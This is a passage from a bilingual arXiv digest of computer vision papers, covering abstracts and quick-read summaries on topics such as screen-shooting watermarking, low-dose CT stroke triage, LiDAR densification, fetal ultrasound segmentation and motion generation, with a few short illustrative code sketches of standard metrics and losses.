类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Screen-shooting robust watermarking aims to imperceptibly embed extractable information into host images such that the watermark survives the complex distortion pipeline of screen display and camera recapture. However, achieving high extraction accuracy while maintaining satisfactory visual quality remains an open challenge, primarily because the screen-shooting channel introduces severe and entangled degradations including Moiré patterns, color-gamut shifts, perspective warping, and sensor noise. In this paper, we present an end-to-end deep learning framework that jointly optimizes watermark embedding and extraction for screen-shooting robustness. Our framework incorporates three key innovations: (i) a comprehensive noise simulation layer that faithfully models realistic screen-shooting distortions – notably including a physically-motivated Moiré pattern generator – enabling the network to learn robust representations against the full spectrum of capture-channel noise through adversarial training; (ii) a Just Noticeable Distortion (JND) perceptual loss function that adaptively modulates watermark embedding strength by supervising the perceptual discrepancy between the JND coefficient map and the watermark residual, thereby concentrating watermark energy in perceptually insensitive regions to maximize visual quality; and (iii) two complementary automatic localization modules – a semantic-segmentation-based foreground extractor for captured image rectification and a symmetric noise template mechanism for anti-cropping region recovery – that enable fully automated watermark decoding under realistic deployment conditions. Extensive experiments demonstrate that our method achieves an average PSNR of 30.94 dB and SSIM of 0.94 on watermarked images while embedding 127-bit payloads.
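For reference, the PSNR figure quoted above follows the standard peak signal-to-noise ratio definition. A minimal sketch over flattened pixel lists (an illustration of the metric, not the authors' evaluation code):

```python
import math

def psnr(original, watermarked, max_val=255.0):
    """Peak signal-to-noise ratio (dB) between host and watermarked pixels."""
    mse = sum((a - b) ** 2 for a, b in zip(original, watermarked)) / len(original)
    if mse == 0:
        return float("inf")  # identical images
    return 10 * math.log10(max_val ** 2 / mse)
```

Values around 30 dB, as reported, correspond to distortions that are generally hard to notice at normal viewing distances.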
[CV-278] Low Dose CT for Stroke Diagnosis: A Dual Pipeline Deep Learning Framework for Portable Neuroimaging
【速读】: This paper addresses the problem that reducing radiation dose in portable CT scanners, used for early stroke detection in prehospital and low-resource settings, increases image noise and degrades diagnostic reliability. The core solution is a deep learning framework for stroke classification from simulated low-dose CT (LDCT) brain scans, supporting AI-assisted triage in mobile clinical environments. The key comparison is between two pipelines: direct classification of noisy LDCT images versus denoise-then-classify, evaluated across multiple dose levels with accuracy, sensitivity, and AUC. The study finds that although denoising improves perceptual image quality, it does not consistently improve classification; in some settings direct classification yields higher sensitivity, revealing a trade-off between perceptual quality and diagnostic utility. The best denoise-then-classify pipeline achieves 0.94 AUC and 0.91 accuracy at moderate doses, up to 6% better than direct classification, establishing a reproducible baseline for LDCT stroke triage and highlighting the need for validation on ischemic cohorts and real portable CT systems.
链接: https://arxiv.org/abs/2603.26764
作者: Rhea Ghosal,Ronok Ghosal,Eileen Lou
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 13 pages, 4 figures, 3 tables. Includes dose-level evaluation and robustness stress tests (motion and ring artifacts). Code and dataset based on RSNA Intracranial Hemorrhage Detection
Abstract:Portable CT scanners enable early stroke detection in prehospital and low-resource settings but require reduced radiation doses, introducing noise that degrades diagnostic reliability. We present a deep learning framework for stroke classification from simulated low-dose CT (LDCT) brain scans for AI-assisted triage in mobile clinical environments. Controlled Poisson noise is applied to high-dose CT images to simulate realistic LDCT conditions. We compare two pipelines: (1) direct classification of noisy LDCT images and (2) denoising followed by classification. Performance is evaluated across multiple dose levels using accuracy, sensitivity, and AUC. While denoising improves perceptual image quality, it does not consistently improve classification. In several settings, direct classification yields higher sensitivity, revealing a trade-off between perceptual quality and diagnostic utility. The best denoise-then-classify pipeline achieves 0.94 AUC and 0.91 accuracy at moderate dose levels, outperforming direct classification by up to 6% in select cases. This work establishes a reproducible baseline for LDCT stroke triage using hemorrhagic stroke data (RSNA dataset) and highlights the need for validation on ischemic cohorts and real-world portable CT systems.
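The dose-simulation step described above (controlled Poisson noise applied to high-dose images) can be sketched as follows. This is an illustrative stand-in, not the paper's implementation: it treats normalized pixels as expected photon counts at a dose-scaled flux, and uses a Gaussian approximation to the Poisson distribution (valid for large counts) to stay stdlib-only; `full_dose_photons` and the normalization are assumptions.

```python
import random

def simulate_low_dose(pixels, dose_fraction, full_dose_photons=10000, seed=0):
    """Simulate reduced-dose CT noise on normalized (0-1) pixels.

    Each pixel is treated as an attenuation-scaled expected photon count at
    flux i0 = full_dose_photons * dose_fraction; lower dose -> fewer photons
    -> relatively noisier image after renormalization.
    """
    rng = random.Random(seed)
    i0 = full_dose_photons * dose_fraction
    noisy = []
    for p in pixels:
        expected = max(i0 * p, 1e-8)
        # Gaussian approximation to Poisson(mean=expected): std = sqrt(mean)
        count = max(rng.gauss(expected, expected ** 0.5), 0.0)
        noisy.append(count / i0)
    return noisy
```

Because the Poisson variance equals the mean, halving the dose roughly doubles the relative noise variance, which is exactly the degradation the classifier must tolerate.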
[CV-279] A Near-Raw Talking-Head Video Dataset for Various Computer Vision Tasks
【速读】: This paper addresses the scarcity and low signal fidelity of talking-head video datasets for real-time communication. The key to the solution is open-sourcing a near-raw talking-head dataset of 847 15-second recordings (about 212 minutes) from 805 participants using 446 consumer webcams in natural environments, all stored with the lossless FFV1 codec to preserve the camera-native signal (uncompressed or MJPEG-encoded), and annotated with subjective quality scores (MOS) plus ten perceptual quality tokens that explain 64.4% of the MOS variance. A stratified benchmarking subset is also curated for compression-efficiency evaluation, and experiments across codecs (H.264, H.265, H.266, AV1) reveal significant interaction effects of content type and background processing on compression efficiency (η² = 0.112-0.149), establishing a high-fidelity, large-scale, structured benchmark for video compression and enhancement models.
链接: https://arxiv.org/abs/2603.26763
作者: Babak Naderi,Ross Cutler
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Multimedia (cs.MM); Image and Video Processing (eess.IV)
备注:
Abstract:Talking-head videos constitute a predominant content type in real-time communication, yet publicly available datasets for video processing research in this domain remain scarce and limited in signal fidelity. In this paper, we open-source a near-raw dataset of 847 talking-head recordings (approximately 212 minutes), each 15 s in duration, captured from 805 participants using 446 unique consumer webcam devices in their natural environments. All recordings are stored using the FFV1 lossless codec, preserving the camera-native signal – uncompressed (24.4%) or MJPEG-encoded (75.6%) – without additional lossy processing. Each recording is annotated with a Mean Opinion Score (MOS) and ten perceptual quality tokens that jointly explain 64.4% of the MOS variance. From this corpus, we curate a stratified benchmarking subset of 120 clips in three content conditions: original, background blur, and background replacement. Codec efficiency evaluation across four datasets and four codecs, namely H.264, H.265, H.266, and AV1, yields VMAF BD-rate savings up to -71.3% (H.266) relative to H.264, with significant encoder \times dataset ( \eta_p^2 = .112 ) and encoder \times content condition ( \eta_p^2 = .149 ) interactions, demonstrating that both content type and background processing affect compression efficiency. The dataset offers 5 \times the scale of the largest prior talking-head webcam dataset (847 vs. 160 clips) with lossless signal fidelity, establishing a resource for training and benchmarking video compression and enhancement models in real-time communication.
[CV-280] Tiny-ViT: A Compact Vision Transformer for Efficient and Explainable Potato Leaf Disease Classification
【速读】: This paper addresses the difficulty of early, precise identification of potato leaf diseases such as Early Blight and Late Blight, aiming to reduce the yield losses and pesticide overuse caused by slow, error-prone manual inspection. The key to the solution is Tiny-ViT, a lightweight and efficient Vision Transformer (ViT) that achieves high accuracy (99.85% test accuracy) even on resource-constrained systems; image preprocessing (including CLAHE enhancement and Gaussian blur) improves input quality, while the model offers low computational cost, strong generalization (MCC = 0.9990), and interpretability (GRAD-CAM localization of diseased regions), providing a reliable path to real-time in-field disease monitoring.
链接: https://arxiv.org/abs/2603.26761
作者: Shakil Mia,Umme Habiba,Urmi Akter,SK Rezwana Quadir Raisa,Jeba Maliha,Md. Iqbal Hossain,Md. Shakhauat Hossan Sumon
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted and Presented Paper at the 2026 IEEE International Conference on Electrical, Computer and Telecommunication Engineering, Rajshahi, Bangladesh
Abstract:Early and precise identification of plant diseases, especially in potato crops, is important to ensure crop health and maximum yield. Potato leaf diseases, such as Early Blight and Late Blight, pose significant challenges to farmers, often resulting in yield losses and increased pesticide use. Traditional methods of detection are not only time-consuming but also subject to human error, which is why automated and efficient methods are required. The paper introduces Tiny-ViT, a small and effective Vision Transformer (ViT) model for potato leaf disease classification, developed for resource-limited systems. The model is tested on a dataset of three classes, namely Early Blight, Late Blight, and Healthy leaves, and the preprocessing procedures include resizing, CLAHE, and Gaussian blur to improve image quality. The Tiny-ViT model achieves an impressive test accuracy of 99.85% and a mean CV accuracy of 99.82%, outperforming baseline models such as DeiT Small, Swin Tiny, and MobileViT XS. In addition, the model has a Matthews Correlation Coefficient (MCC) of 0.9990 and narrow confidence intervals (CI) of [0.9980, 0.9995], which indicates high reliability and generalization. The training and testing inference time is competitive, and the model exhibits low computational expense, thereby making it applicable in real-time settings. Moreover, interpretability of the model is improved with the help of GRAD-CAM, which identifies diseased areas. Altogether, the proposed Tiny-ViT is a robust, efficient, and explainable solution to the problem of plant disease classification.
[CV-281] An Intelligent Framework for Real-Time Yoga Pose Detection and Posture Correction
【速读】: This paper addresses the reduced training effectiveness and increased musculoskeletal injury risk caused by improper posture execution in self-guided or online yoga practice. The core solution is a hybrid Edge-AI framework whose key lies in combining lightweight human pose estimation with biomechanical feature extraction and a CNN-LSTM temporal learning architecture to recognize yoga poses and analyze motion dynamics; joint angles and skeletal features are computed and compared against reference pose configurations to quantify posture correctness, with real-time corrective guidance delivered through visual, textual, and voice feedback, while optimizations such as model quantization and pruning ensure low-latency operation on resource-constrained devices.
链接: https://arxiv.org/abs/2603.26760
作者: Chandramouli Haldar
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Yoga is widely recognized for improving physical fitness, flexibility, and mental well-being. However, these benefits depend strongly on correct posture execution. Improper alignment during yoga practice can reduce effectiveness and increase the risk of musculoskeletal injuries, especially in self-guided or online training environments. This paper presents a hybrid Edge-AI-based framework for real-time yoga pose detection and posture correction. The proposed system integrates lightweight human pose estimation models with biomechanical feature extraction and a CNN-LSTM-based temporal learning architecture to recognize yoga poses and analyze motion dynamics. Joint angles and skeletal features are computed from detected keypoints and compared with reference pose configurations to evaluate posture correctness. A quantitative scoring mechanism is introduced to measure alignment deviations and generate real-time corrective feedback through visual, text-based, and voice-based guidance. In addition, Edge-AI optimization techniques such as model quantization and pruning are applied to enable low-latency performance on resource-constrained devices. The proposed framework provides an intelligent and scalable digital yoga assistant that can improve user safety and training effectiveness in modern fitness applications.
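The joint-angle comparison at the core of the posture-scoring step can be sketched as below. This is a generic illustration with hypothetical function names and a 15-degree tolerance, not the paper's actual scoring mechanism.

```python
import math

def joint_angle(a, b, c):
    """Angle in degrees at joint b, formed by 2D keypoints a-b-c."""
    v1 = (a[0] - b[0], a[1] - b[1])
    v2 = (c[0] - b[0], c[1] - b[1])
    dot = v1[0] * v2[0] + v1[1] * v2[1]
    cos_ang = dot / (math.hypot(*v1) * math.hypot(*v2))
    cos_ang = max(-1.0, min(1.0, cos_ang))  # guard against rounding drift
    return math.degrees(math.acos(cos_ang))

def pose_score(angles, reference, tol=15.0):
    """Fraction of joints within tol degrees of the reference configuration."""
    ok = sum(1 for a, r in zip(angles, reference) if abs(a - r) <= tol)
    return ok / len(reference)
```

A score below some threshold would then trigger the corrective feedback channel (visual, text, or voice) for the deviating joints.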
[CV-282] Physics-Aware Diffusion for LiDAR Point Cloud Densification
【速读】: This paper targets the performance degradation caused by sparse point clouds on distant objects in LiDAR perception, while avoiding the high latency and physical hallucinations (e.g., ghost points) of existing generative diffusion approaches. The key is to treat densification as probabilistic refinement rather than generation: applying partial diffusion (SDEdit) on a coarse prior yields high-fidelity results in just 156 ms, and a Ray-Consistency loss together with Negative Ray Augmentation enforces sensor physics to suppress artifacts, achieving state-of-the-art results on KITTI-360 and nuScenes and directly boosting off-the-shelf 3D detectors without retraining.
链接: https://arxiv.org/abs/2603.26759
作者: Zeping Zhang,Robert Laganière
机构: University of Ottawa (渥太华大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:LiDAR perception is severely limited by the distance-dependent sparsity of distant objects. While diffusion models can recover dense geometry, they suffer from prohibitive latency and physical hallucinations manifesting as ghost points. We propose Scanline-Consistent Range-Aware Diffusion, a framework that treats densification as probabilistic refinement rather than generation. By leveraging Partial Diffusion (SDEdit) on a coarse prior, we achieve high-fidelity results in just 156ms. Our novel Ray-Consistency loss and Negative Ray Augmentation enforce sensor physics to suppress artifacts. Our method achieves state-of-the-art results on KITTI-360 and nuScenes, directly boosting off-the-shelf 3D detectors without retraining. Code will be made available.
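The physical intuition behind ray consistency is that a densified point must not appear in front of the sensor's real return on the same ray, since the laser demonstrably travelled through that space. The paper enforces this as a training loss; the sketch below is only a conceptual post-hoc filter with hypothetical data structures, to make the constraint concrete.

```python
def filter_ghost_points(generated, observed, margin=0.1):
    """Keep a generated (ray_id, range) point only if it does not sit in front
    of the real LiDAR return on its ray (known-empty space -> ghost point).

    generated: list of (ray_id, range_in_meters) candidate points.
    observed:  dict mapping ray_id -> measured return range for that ray.
    """
    kept = []
    for ray_id, rng in generated:
        real = observed.get(ray_id)
        if real is None or rng >= real - margin:
            kept.append((ray_id, rng))  # behind or at the return: plausible
        # else: in free space ahead of the return -> discard as a ghost
    return kept
```

In the paper this logic acts as a differentiable penalty during training (plus augmentation with deliberately violating "negative" rays) rather than a hard filter at inference time.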
[CV-283] GradAttn: Replacing Fixed Residual Connections with Task-Modulated Attention Pathways
【速读】: This paper addresses gradient-signal degradation as network depth increases in deep ConvNets, which limits effective feature learning in complex architectures. Traditional residual networks (ResNets) mitigate this with fixed shortcut connections, but these cannot adapt gradient flow to input complexity or selectively emphasize task-relevant features. The key to the solution is GradAttn, a hybrid CNN-Transformer framework that replaces fixed residual connections with attention-controlled gradient flow: multi-scale CNN features are extracted at different depths and regulated through self-attention, dynamically weighting shallow texture features and deep semantic representations, thereby achieving learnable gradient control, significantly improving generalization, and validating attention mechanisms as a new paradigm for gradient regulation.
链接: https://arxiv.org/abs/2603.26756
作者: Soudeep Ghoshal,Himanshu Buckchash
机构: Kalinga Institute of Industrial Technology (凯林加工业技术学院); IMC University of Applied Sciences Krems (IMC应用科学大学克雷姆斯分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 14 pages, 5 figures. Under review
Abstract:Deep ConvNets suffer from gradient signal degradation as network depth increases, limiting effective feature learning in complex architectures. ResNet addressed this through residual connections, but these fixed short-circuits cannot adapt to varying input complexity or selectively emphasize task-relevant features across network hierarchies. This study introduces GradAttn, a hybrid CNN-transformer framework that replaces fixed residual connections with attention-controlled gradient flow. By extracting multi-scale CNN features at different depths and regulating them through self-attention, GradAttn dynamically weights shallow texture features and deep semantic representations. For representational analysis, we evaluated three GradAttn variants across eight diverse datasets, from natural images, medical imaging, to fashion recognition. Results demonstrate that GradAttn outperforms ResNet-18 on five of eight datasets, achieving up to +11.07% accuracy improvement on FashionMNIST while maintaining comparable network size. Gradient flow analysis reveals that controlled instabilities, introduced by attention, often coincide with improved generalization, challenging the assumption that perfect stability is optimal. Furthermore, positional encoding effectiveness proves dataset dependent, with CNN hierarchies frequently encoding sufficient spatial structure. These findings position attention mechanisms as enablers of learnable gradient control, offering a new paradigm for adaptive representation learning in deep neural architectures.
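The contrast between a fixed residual shortcut and attention-controlled fusion can be reduced to a toy sketch: a ResNet shortcut always combines features 1:1, whereas learned scores can reweight shallow versus deep contributions per input. This is a conceptual illustration only, not GradAttn's actual architecture; the scalar scores stand in for a full self-attention block.

```python
import math

def softmax(xs):
    m = max(xs)
    e = [math.exp(x - m) for x in xs]
    s = sum(e)
    return [v / s for v in e]

def fixed_residual(shallow, deep):
    """ResNet-style fixed shortcut: equal, non-adaptive combination."""
    return [a + b for a, b in zip(shallow, deep)]

def attention_fused(shallow, deep, score_shallow, score_deep):
    """GradAttn-style idea (simplified): learned scores decide how much each
    depth contributes, instead of a fixed 1:1 shortcut."""
    w = softmax([score_shallow, score_deep])
    return [w[0] * a + w[1] * b for a, b in zip(shallow, deep)]
```

In backpropagation, those weights also scale the gradient flowing through each pathway, which is the "learnable gradient control" the paper refers to.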
[CV-284] Domain-Guided YOLO26 with Composite BCE-Dice-Lovász Loss for Multi-Class Fetal Head Ultrasound Segmentation
【速读】: This paper addresses fetal head structure segmentation in prenatal ultrasound, a practical bottleneck in obstetric image analysis. The existing state-of-the-art baseline adapts the Segment Anything Model with per-class Dice and Lovász losses but still requires bounding-box prompts at test time. The core solution is a prompt-free, end-to-end pipeline built on YOLO26-Seg that jointly detects and segments the Brain, Cavum Septi Pellucidi (CSP), and Lateral Ventricles (LV) in a single forward pass. Key innovations: (i) a composite BCE-Dice-Lovász loss with inverse-frequency class weighting, injected into the YOLO26 training loop via runtime monkey-patching; (ii) domain-guided copy-paste augmentation that transplants minority-class structures while respecting their anatomical position relative to the brain boundary; and (iii) inter-patient stratified splitting to avoid data leakage. On 575 test images the method reaches a mean Dice of 0.9253, 2.68 percentage points above the baseline (0.9012), and this mean covers only the three foreground classes whereas the baseline's includes the easy background class.
链接: https://arxiv.org/abs/2603.26755
作者: M. Fazri Nizar
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Segmenting fetal head structures from prenatal ultrasound remains a practical bottleneck in obstetric imaging. The current state-of-the-art baseline, proposed alongside the published dataset, adapts the Segment Anything Model with per-class Dice and Lovász losses but still depends on bounding-box prompts at test time. We build a prompt-free pipeline on top of YOLO26-Seg that jointly detects and segments three structures, Brain, Cavum Septi Pellucidi (CSP), and Lateral Ventricles (LV), in a single forward pass. Three modifications are central to our approach: (i) a composite BCE-Dice-Lovász segmentation loss with inverse-frequency class weighting, injected into the YOLO26 training loop via runtime monkey-patching; (ii) domain-guided copy-paste augmentation that transplants minority-class structures while respecting their anatomical location relative to the brain boundary; and (iii) inter-patient stratified splitting to prevent data leakage. On 575 held-out test images, the composite loss variant reaches a mean Dice coefficient of 0.9253, exceeding the baseline (0.9012) by 2.68 percentage points, despite averaging over only the three foreground classes, whereas the baseline’s reported mean includes the easy background class. We further ablate each component and discuss annotation-quality and class-imbalance effects on CSP and LV performance.
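A minimal sketch of the inverse-frequency class weighting and the BCE + Dice part of the composite objective, over flattened per-pixel probabilities for one class. The Lovász term is omitted here for brevity, and the weights and epsilon values are illustrative rather than the paper's exact settings.

```python
import math

def inverse_frequency_weights(pixel_counts):
    """Per-class weights proportional to 1/frequency, normalized to mean 1."""
    inv = [1.0 / max(c, 1) for c in pixel_counts]
    scale = len(inv) / sum(inv)
    return [w * scale for w in inv]

def soft_dice_loss(probs, targets, eps=1e-6):
    """1 - soft Dice overlap; zero for a perfect binary prediction."""
    inter = sum(p * t for p, t in zip(probs, targets))
    denom = sum(probs) + sum(targets)
    return 1.0 - (2 * inter + eps) / (denom + eps)

def bce_loss(probs, targets, eps=1e-7):
    """Mean binary cross-entropy over pixels."""
    return -sum(t * math.log(p + eps) + (1 - t) * math.log(1 - p + eps)
                for t, p in zip(targets, probs)) / len(probs)

def composite_loss(probs, targets, w_bce=1.0, w_dice=1.0):
    """BCE + Dice composite for one class (the paper adds a Lovász term too)."""
    return w_bce * bce_loss(probs, targets) + w_dice * soft_dice_loss(probs, targets)
```

Rare structures like CSP and LV receive large weights under the inverse-frequency scheme, which counteracts the pixel imbalance the abstract discusses.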
[CV-285] Generating Synthetic Wildlife Health Data from Camera Trap Imagery: A Pipeline for Alopecia and Body Condition Training Data
【速读】: This paper addresses the absence of publicly available, ML-ready annotated datasets for wildlife health conditions, which blocks progress on automated health screening. The core solution is a pipeline for generating synthetic training images: base samples are curated from real camera-trap imagery, and a generative phenotype-editing system produces alopecia and body-condition-deterioration variants with controlled severity, while an adaptive scene-drift quality-control mechanism ensures the generated images remain realistic and usable. The key insight is to treat the generated data explicitly as a screening data source rather than a full substitute for real data; a sim-to-real transfer experiment shows that training on synthetic data alone achieves 0.85 AUROC, indicating the generated images capture visual features sufficient for health screening.
链接: https://arxiv.org/abs/2603.26754
作者: David Brundage
机构: University of Wisconsin - Madison, School of Veterinary Medicine (威斯康星大学麦迪逊分校兽医学院)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:No publicly available, ML-ready datasets exist for wildlife health conditions in camera trap imagery, creating a fundamental barrier to automated health screening. We present a pipeline for generating synthetic training images depicting alopecia and body condition deterioration in wildlife from real camera trap photographs. Our pipeline constructs a curated base image set from iWildCam using MegaDetector-derived bounding boxes and center-frame-weighted stratified sampling across 8 North American species. A generative phenotype editing system produces controlled severity variants depicting hair loss consistent with mange and emaciation. An adaptive scene-drift quality-control system uses a sham prefilter and a decoupled mask-then-score approach with complementary day/night metrics to reject images where the generative model altered the original scene. We frame the pipeline explicitly as a screening data source. From 201 base images across 4 species, we generate 553 QC-passing synthetic variants with an overall pass rate of 83 percent. A sim-to-real transfer experiment training exclusively on synthetic data and testing on real camera trap images of suspected health conditions achieves 0.85 AUROC, demonstrating that the synthetic data captures visual features sufficient for screening.
[CV-286] Survey on Remote Sensing Scene Classification: From Traditional Methods to Large Generative AI Models
【速读】: This survey addresses the technical bottlenecks and research gaps in the evolution of remote sensing scene classification from traditional handcrafted feature extraction to modern AI systems, particularly how to improve performance under low annotation budgets, cross-domain generalization, and multimodal fusion. Its key contribution is a systematic account of the trajectory from classical texture descriptors through deep learning architectures (convolutional neural networks, Vision Transformers, graph neural networks) to current self-supervised foundation models and generative AI methods, emphasizing synthetic data generation and advanced feature-learning strategies to address practical obstacles such as annotation cost, limited interpretability, and ethical challenges, thereby pushing remote sensing scene classification toward more efficient, robust, and sustainable systems.
链接: https://arxiv.org/abs/2603.26751
作者: Qionghao Huang,Can Hu
机构: South China Normal University (华南师范大学); Zhejiang Normal University (浙江师范大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted in Journal of King Saud University Computer and Information Sciences
Abstract:Remote sensing scene classification has experienced a paradigmatic transformation from traditional handcrafted feature methods to sophisticated artificial intelligence systems that now form the backbone of modern Earth observation applications. This comprehensive survey examines the complete methodological evolution, systematically tracing development from classical texture descriptors and machine learning classifiers through the deep learning revolution to current state-of-the-art foundation models and generative AI approaches. We chronicle the pivotal shift from manual feature engineering to automated hierarchical representation learning via convolutional neural networks, followed by advanced architectures including Vision Transformers, graph neural networks, and hybrid frameworks. The survey provides in-depth coverage of breakthrough developments in self-supervised foundation models and vision-language systems, highlighting exceptional performance in zero-shot and few-shot learning scenarios. Special emphasis is placed on generative AI innovations that tackle persistent challenges through synthetic data generation and advanced feature learning strategies. We analyze contemporary obstacles including annotation costs, multimodal data fusion complexities, interpretability demands, and ethical considerations, alongside current trends in edge computing deployment, federated learning frameworks, and sustainable AI practices. Based on comprehensive analysis of recent advances and gaps, we identify key future research priorities: advancing hyperspectral and multi-temporal analysis capabilities, developing robust cross-domain generalization methods, and establishing standardized evaluation protocols to accelerate scientific progress in remote sensing scene classification systems.
[CV-287] From Diffusion To Flow: Efficient Motion Generation In MotionGPT 3 ICLR2026
【速读】: This paper investigates how diffusion versus rectified-flow training objectives differ in convergence speed, inference efficiency, and generation quality for text-driven motion generation in a continuous latent space. The key to the solution is a controlled empirical study within the MotionGPT3 framework that holds the model architecture, training protocol, and evaluation setup fixed, isolating the effect of the generative objective and clarifying whether rectified flow's known advantages in image and audio generation carry over to motion. Experiments show that rectified flow converges faster, performs better early in training, and is more stable across sampling-step counts, achieving better efficiency-quality trade-offs and underscoring the importance of the training-objective choice for motion priors.
链接: https://arxiv.org/abs/2603.26747
作者: Jaymin Ban,JiHong Jeon,SangYeop Jeong
机构: Seoul National University of Science and Technology (首尔科学技术大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: ReALM-GEN Workshop ICLR 2026
Abstract:Recent text-driven motion generation methods span both discrete token-based approaches and continuous-latent formulations. MotionGPT3 exemplifies the latter paradigm, combining a learned continuous motion latent space with a diffusion-based prior for text-conditioned synthesis. While rectified flow objectives have recently demonstrated favorable convergence and inference-time properties relative to diffusion in image and audio generation, it remains unclear whether these advantages transfer cleanly to the motion generation setting. In this work, we conduct a controlled empirical study comparing diffusion and rectified flow objectives within the MotionGPT3 framework. By holding the model architecture, training protocol, and evaluation setup fixed, we isolate the effect of the generative objective on training dynamics, final performance, and inference efficiency. Experiments on the HumanML3D dataset show that rectified flow converges in fewer training epochs, reaches strong test performance earlier, and matches or exceeds diffusion-based motion quality under identical conditions. Moreover, flow-based priors exhibit stable behavior across a wide range of inference step counts and achieve competitive quality with fewer sampling steps, yielding improved efficiency–quality trade-offs. Overall, our results suggest that several known benefits of rectified flow objectives do extend to continuous-latent text-to-motion generation, highlighting the importance of the training objective choice in motion priors.
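The rectified-flow objective discussed above trains a network to predict the constant velocity along the straight line between a data sample and noise, which is why few-step Euler sampling works well when the learned paths are nearly straight. A toy sketch, with an oracle velocity standing in for the learned network:

```python
def rectified_flow_pair(x0, x1, t):
    """Linear interpolation path used by rectified flow: at x_t the network is
    trained to predict the constant velocity (x1 - x0)."""
    xt = [(1 - t) * a + t * b for a, b in zip(x0, x1)]
    velocity_target = [b - a for a, b in zip(x0, x1)]
    return xt, velocity_target

def euler_sample(velocity_fn, x1, steps):
    """Few-step Euler integration from noise x1 (t=1) back toward data (t=0)."""
    x = list(x1)
    dt = 1.0 / steps
    for i in range(steps):
        t = 1.0 - i * dt
        v = velocity_fn(x, t)
        x = [xi - dt * vi for xi, vi in zip(x, v)]
    return x
```

With a perfectly straight velocity field, even a single Euler step recovers the data point exactly; this is the mechanism behind the "competitive quality with fewer sampling steps" result reported above.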
[CV-288] TDEC: Deep Embedded Image Clustering with Transformer and Distribution Information
【速读】: This paper addresses two weaknesses of existing deep clustering (DC) methods on high-dimensional image data: they neglect global information fusion across different image regions, and the learned features are clustering-unfriendly (dimensionally redundant and relying only on simple distance information). The key to the solution is TDEC, a novel deep embedded image clustering framework whose core innovations are: a Transformer-based T-Encoder module that learns discriminative features with global dependencies; a Dim-Reduction block that builds a clustering-friendly low-dimensional space; and the use of the distribution information of embedded features during clustering to provide reliable supervised signals for joint training, substantially improving clustering performance on complex image data.
链接: https://arxiv.org/abs/2603.26746
作者: Ruilin Zhang,Haiyang Zheng,Hongpeng Wang
机构: Harbin Institute of Technology, Shenzhen(哈尔滨工业大学深圳校区); Peng Cheng Laboratory(鹏城实验室)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:Image clustering is a crucial but challenging task in multimedia machine learning. Recently the combination of clustering with deep learning has achieved promising performance against conventional methods on high-dimensional image data. Unfortunately, existing deep clustering methods (DC) often ignore the importance of information fusion with a global perception field among different image regions on clustering images, especially complex ones. Additionally, the learned features are usually clustering-unfriendly in terms of dimensionality and are based only on simple distance information for the clustering. In this regard, we propose TDEC, a deep embedded image clustering method that, for the first time to our knowledge, jointly considers feature representation, dimensional preference, and robust assignment for image clustering. Specifically, we introduce the Transformer to form a novel module T-Encoder to learn discriminative features with global dependency while using the Dim-Reduction block to build a friendly low-dimensional space favoring clustering. Moreover, the distribution information of embedded features is considered in the clustering process to provide reliable supervised signals for joint training. Our method is robust and allows for more flexibility in data size, the number of clusters, and the context complexity. More importantly, the clustering performance of TDEC is much higher than that of recent competitors. Extensive experiments with state-of-the-art approaches on complex datasets show the superiority of TDEC.
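The "distribution information as a supervised signal" idea is in the spirit of DEC-style self-training: soft assignments from a Student's t kernel over distances to cluster centers are sharpened into an auxiliary target distribution that emphasizes confident assignments. The sketch below shows those two standard formulas; whether TDEC uses exactly this form is not stated in the abstract, so treat it as an assumption.

```python
def soft_assignments(dist_sq, alpha=1.0):
    """Student's t kernel over squared distances to cluster centers (DEC-style)."""
    q = [(1 + d / alpha) ** (-(alpha + 1) / 2) for d in dist_sq]
    s = sum(q)
    return [v / s for v in q]

def target_distribution(q_rows):
    """Sharpened auxiliary distribution p_ij proportional to q_ij^2 / f_j,
    where f_j is the soft cluster frequency; used as a self-training target."""
    k = len(q_rows[0])
    f = [sum(row[j] for row in q_rows) for j in range(k)]
    p_rows = []
    for row in q_rows:
        w = [row[j] ** 2 / f[j] for j in range(k)]
        s = sum(w)
        p_rows.append([v / s for v in w])
    return p_rows
```

Training then minimizes the KL divergence between the target and the soft assignments, pulling embeddings toward their most likely clusters.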
[CV-289] Motion Semantics Guided Normalizing Flow for Privacy-Preserving Video Anomaly Detection ICME2026
【速读】:该论文旨在解决骨架表示的视频异常检测(Skeleton-based Video Anomaly Detection, VAD)中因现有方法以整体方式建模连续运动轨迹而无法有效捕捉人类活动的层次化语义结构与细粒度动作差异的问题,导致在不同抽象层级上异常表现的判别能力不足。其解决方案的关键在于提出Motion Semantics Guided Normalizing Flow (MSG-Flow),通过三阶段架构实现分层建模:首先使用向量量化变分自编码器(Vector Quantized Variational Auto-Encoder, VQ-VAE)将连续运动离散化为可解释的动作基元;其次利用自回归Transformer建模语义层级的时间依赖关系;最后采用条件归一化流(Conditional Normalizing Flow)捕获细节层级的姿态变化,从而在多个抽象层次上增强对异常行为的感知能力。
链接: https://arxiv.org/abs/2603.26745
作者: Yang Liu,Boan Chen,Yuanyuan Meng,Jing Liu,Zhengliang Guo,Wei Zhou,Peng Sun,Hong Chen
机构: Tongji Univ.(同济大学); SJTU(上海交通大学); Shanghai Creative Studies Institute(上海创意研究院); UBC(不列颠哥伦比亚大学); Fudan Univ.(复旦大学); Cardiff Univ.(卡迪夫大学); DKU(昆山杜克大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to IEEE ICME 2026
